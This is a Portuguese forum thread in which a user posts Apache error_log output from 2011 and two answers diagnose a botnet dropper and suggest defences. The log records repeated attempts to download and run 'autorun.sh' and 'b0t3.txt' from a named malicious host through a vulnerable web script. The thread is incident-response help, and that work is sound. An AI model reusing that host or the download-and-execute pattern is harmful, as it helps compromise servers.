apache error_log

Navegue suas respostas
1

Estou enfrentando problemas com o apache. Os seguintes logs estão sendo exibidos no arquivo error_log. 

--15:01:26--  http://bandits.ucoz.hu/autorun.sh
Resolving bandits.ucoz.hu... 193.109.247.50
Connecting to bandits.ucoz.hu|193.109.247.50|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 396 [application/octet-stream]
Saving to: 'autorun.sh'

     0K                                                       100% 51.6M=0s

15:01:26 (51.6 MB/s) - 'autorun.sh' saved [396/396]

sh: fetch: command not found
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100   396  100   396    0     0  70387      0 --:--:-- --:--:-- --:--:--     0
connected.
HTTP request sent, awaiting response... 200 OK
Length: 28762 (28K) [text/plain]
Saving to: 'b0t3.txt'

     0K .......... .......... ........                        100% 8.75M=0.003s

15:01:27 (8.75 MB/s) - 'b0t3.txt' saved [28762/28762]

sh: fetch: command not found
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100 28762  100 28762    0     0  3434k      0 --:--:-- --:--:-- --:--:-- 13.1M
sh: /usr/bin/lwp-download: /usr/bin/perl: bad interpreter: Permission denied
sh: /usr/bin/perl: Permission denied
--15:01:27--  http://bandits.ucoz.hu/autorun.sh
Resolving bandits.ucoz.hu... 193.109.247.50
Connecting to bandits.ucoz.hu|193.109.247.50|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 396 [application/octet-stream]
Saving to: 'autorun.sh'

     0K                                                       100% 31.8M=0s

15:01:27 (31.8 MB/s) - 'autorun.sh' saved [396/396]

sh: fetch: command not found
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100   396  100   396    0     0  48768      0 --:--:-- --:--:-- --:--:--     0

Como posso evitar este problema?

    
por User4283 19.07.2011 / 15:56

2 respostas

2

parece que alguém tentou baixar e executar o script perl usando uma das suas páginas da web que podem estar vulneráveis. - tentou desativar a execução de todos os intérpretes (perl, phyton, curl, c, etc).

  • Eu suponho que poderia ser o apache + php, se sim, você pode estar desabilitado: allow_url_fopen = Desativado, para desativar os downloads via PHP.

  • adicione httpd mod_security

  • corrigiu seu script de página da Web vulnerável
  • abra o firewall de saída para determinados ips / ports
por 19.07.2011 / 16:25
1

Você tem um script em algum lugar para pegar o que parece ser um script de botnets, tentando salvá-lo & executar localmente. o que não está acontecendo, pois está no arquivo de erros.

  • bloqueia os bandidos ip [embora provavelmente haja vários outros]
  • encontre esse script [grep para o URL dos bandidos]

  • descubra o que esse script está usando para recuperar o arquivo [bloqueá-lo se possível]

  • download & digitalizar com rkhunter

  • assista sua fila de mensagens
  • veja coisas estranhas na sua lista de processos

-sean

    
por 19.07.2011 / 16:22

Tags

modem de fax virtual + serviço de fax + console para visualizar faxes SQL 2008 Backups gravados no log de eventos